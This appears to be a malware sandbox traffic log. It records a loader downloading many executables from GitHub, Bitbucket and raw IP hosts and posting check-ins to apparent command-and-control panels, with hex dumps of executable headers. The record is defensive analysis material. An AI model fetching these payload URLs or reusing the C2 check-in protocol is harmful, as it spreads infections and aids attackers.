00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 23 Jun 2024 22:10:12 GMTContent-Type: application/octet-streamContent-Length: 424960Last-Modified: Sun, 16 Jun 2024 06:41:45 GMTConnection: keep-aliveETag: "666e8929-67c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 29 89 6e 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 ea d7 01 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c 00 06 00 8c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 dc 4b 00 00 90 90 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 91 05 00 18 00 00 00 c8 90 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 cc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9a e3 04 00 00 10 00 00 00 e4 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 3a 10 01 00 00 00 05 00 00 12 01 00 00 e8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 65 00 00 00 20 06 00 00 34 00 00 00 fa 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 2e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 dc 4b 00 00 00 a0 06 00 00 4c 00 00 00 30 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 23 Jun 2024 22:10:18 GMTContent-Type: application/octet-streamContent-Length: 675368Last-Modified: Mon, 17 Jun 2024 16:10:43 GMTConnection: keep-aliveETag: "66706003-a4e28"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c5 0b f2 5c 81 6a 9c 0f 81 6a 9c 0f 81 6a 9c 0f 52 18 9f 0e 90 6a 9c 0f 52 18 99 0e 2f 6a 9c 0f 52 18 98 0e 97 6a 9c 0f 43 eb 98 0e 93 6a 9c 0f 52 18 9d 0e 86 6a 9c 0f 81 6a 9d 0f 07 6a 9c 0f 43 eb 99 0e dc 6a 9c 0f 43 eb 9f 0e 99 6a 9c 0f 72 e8 99 0e 80 6a 9c 0f 72 e8 63 0f 80 6a 9c 0f 72 e8 9e 0e 80 6a 9c 0f 52 69 63 68 81 6a 9c 0f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 8d 5c 70 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 7e 02 00 00 b8 07 00 00 00 00 00 e6 c1 00 00 00 10 00 00 00 90 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 0a 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 45 03 00 28 00 00 00 00 30 0a 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 28 0a 00 28 26 00 00 00 40 0a 00 78 22 00 00 b8 1a 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 03 00 18 00 00 00 f8 19 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 02 00 68 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d2 7c 02 00 00 10 00 00 00 7e 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ba bd 00 00 00 90 02 00 00 be 00 00 00 82 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 d2 06 00 00 50 03 00 00 c2 06 00 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 30 0a 00 00 02 00 00 00 02 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 78 22 00 00 00 40 0a 00 00 24 00 00 00 04 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 23 Jun 2024 22:10:20 GMTContent-Type: application/octet-streamContent-Length: 6098432Last-Modified: Sat, 22 Jun 2024 14:27:53 GMTConnection: keep-aliveETag: "6676df69-5d0e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 24 00 e8 20 00 00 0a 5d 00 00 ca 05 00 c0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 63 00 00 04 00 00 7a ec 5d 00 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 90 60 00 4e 00 00 00 00 a0 60 00 d0 13 00 00 00 e0 60 00 eb a2 01 00 00 e0 59 00 d8 c0 00 00 00 00 00 00 00 00 00 00 00 90 62 00 a0 c6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 c3 59 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c a4 60 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 e7 20 00 00 10 00 00 00 e8 20 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 60 60 2e 64 61 74 61 00 00 00 30 07 05 00 00 00 21 00 00 08 05 00 00 ec 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 10 c2 33 00 00 10 26 00 00 c4 33 00 00 f4 25 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 70 64 61 74 61 00 00 d8 c0 00 00 00 e0 59 00 00 c2 00 00 00 b8 59 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 78 64 61 74 61 00 00 44 0c 00 00 00 b0 5a 00 00 0e 00 00 00 7a 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 80 c8 05 00 00 c0 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 4e 00 00 00 00 90 60 00 00 02 00 00 00 88 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 13 00 00 00 a0 60 00 00 14 00 00 00 8a 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 70 00 00 00 00 c0 60 00 00 02 00 00 00 9e 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 d0 60 00 00 02 00 00 00 a0 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 73 72 63 00 00 00 eb a2 01 00 00 e0 60 00 00 a4 01 00 00 a2 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 a0 c6 00 00 00 90 62 00 00 c8 00 00 00 46 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 23 Jun 2024 22:10:21 GMTContent-Type: application/octet-streamContent-Length: 2665984Last-Modified: Mon, 29 May 2023 20:39:56 GMTConnection: keep-aliveETag: "64750d9c-28ae00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 08 00 9c d2 ae 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 92 00 00 00 18 28 00 00 00 00 00 40 11 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 29 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a8 cb 00 00 3c 00 00 00 00 00 29 00 88 14 00 00 00 d0 28 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 20 29 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 b0 00 00 28 00 00 00 10 b4 00 00 38 01 00 00 00 00 00 00 00 00 00 00 40 cd 00 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 90 00 00 00 10 00 00 00 92 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc 22 00 00 00 b0 00 00 00 24 00 00 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 90 e9 27 00 00 e0 00 00 00 d6 27 00 00 ba 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 8c 01 00 00 00 d0 28 00 00 02 00 00 00 90 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 10 00 00 00 00 e0 28 00 00 02 00 00 00 92 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 10 00 00 00 00 f0 28 00 00 02 00 00 00 94 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 14 00 00 00 00 29 00 00 16 00 00 00 96 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 78 00 00 00 00 20 29 00 00 02 00 00 00 ac 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /frielandrews892/File/releases/download/installer/Installer.exe HTTP/1.1Host: github.com
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/815364555/3f12ea9a-79fa-40c4-802f-9bbddfc164da?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240623%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240623T221015Z&X-Amz-Expires=300&X-Amz-Signature=c163ac208612b7b63d5785e8f151bf6531baa21ef9044bfa7b39e25f7ba95711&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=815364555&response-content-disposition=attachment%3B%20filename%3DInstaller.exe&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tmp/1.exe HTTP/1.1Host: comrex.pk
Source: global traffic	HTTP traffic detected: GET /George.exe HTTP/1.1Host: moreapp4you.onlineConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tons1/tronssss/downloads/5geo.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2e88b5ff-15af-42da-aaae-e65938d632e2/downloads/8ec94b2f-0bee-467a-979c-d152d74b6b83/5geo.exe?response-content-disposition=attachment%3B%20filename%3D%225geo.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJIBTCJVT&Signature=tjx3UYEd%2Fu3DTSp8pqQDsBEn5Is%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEO%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIAePWN9bqbzKFV4W1jlqY%2B2IC9HQ1lq9ul%2FsBNxJqUGfAiEAgXldbcYRKjI9j0sReAGp9XE3D%2FC7L%2BjKiECYbFauZ%2B0qsAIIl%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDJa1Oxy7WjMYvEFUGiqEAi9apPZmrQbF%2FK2PWFsJSGhkeSLVH5VtT7kV15hVFRE77icQ6LzMNkeJigGbz4sHg3TZ3lopaxd64ZgYeB7rWGtVHNATJsmZoxA%2F9Vd48ItxGuW8d9%2BYG9fm0Tu8nVDW22rOhFWQ4SQPo7gP6uMWw%2Fu9Q1EJGAKOe4JiffKVLi3uZuPi8AYB8j1MquDBf3WAgb2vv%2FgSoPQRObbX0OkfyFeUDo%2Bna80Zh4v6XDTaHvC5JTODmeHg41UFnkzAP4HFYjVqgcnXxAf4s703Ks6GNu8YabTRCs%2FrgySi0qjcvrgsQ2O5t6T0h9lVoiZP9evoDAjP5%2FNNWiCymkV1MYArZWOoOKdGMMq44rMGOp0BCdM12mesubPrtlg52rlPU1gfmywiP2Un5s72UeH9ztPaKWvzHLGcQxg71ozZosXuHk5%2FNy5tI8ttB2WNlIjfQ0HDWeRHpaXqqmeqRcQNOVd4dmQ%2B7mdAhCG26UXDf4cOEErJSiRJzZT8pIcmSJw6R8Pc%2BtmrkV9OeYcOQSXdscPusE2xrhSqTYUrGFA8DiZRlkUIy71IZHjIjWFfBA%3D%3D&Expires=1719182162 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: GET /lend/ama.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000007001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /lend/gold.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 33 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000035001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /lend/lummac2.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 34 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000047001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /NewLatest.exe HTTP/1.1Host: 185.172.128.116
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 36 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000064001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000091001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /lend/legs.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 39 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000092001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 30 30 30 31 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1000014001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /lend/taskweaker.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic	HTTP traffic detected: GET /FirstZ.exe HTTP/1.1Host: 185.172.128.116
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 31 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000015001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
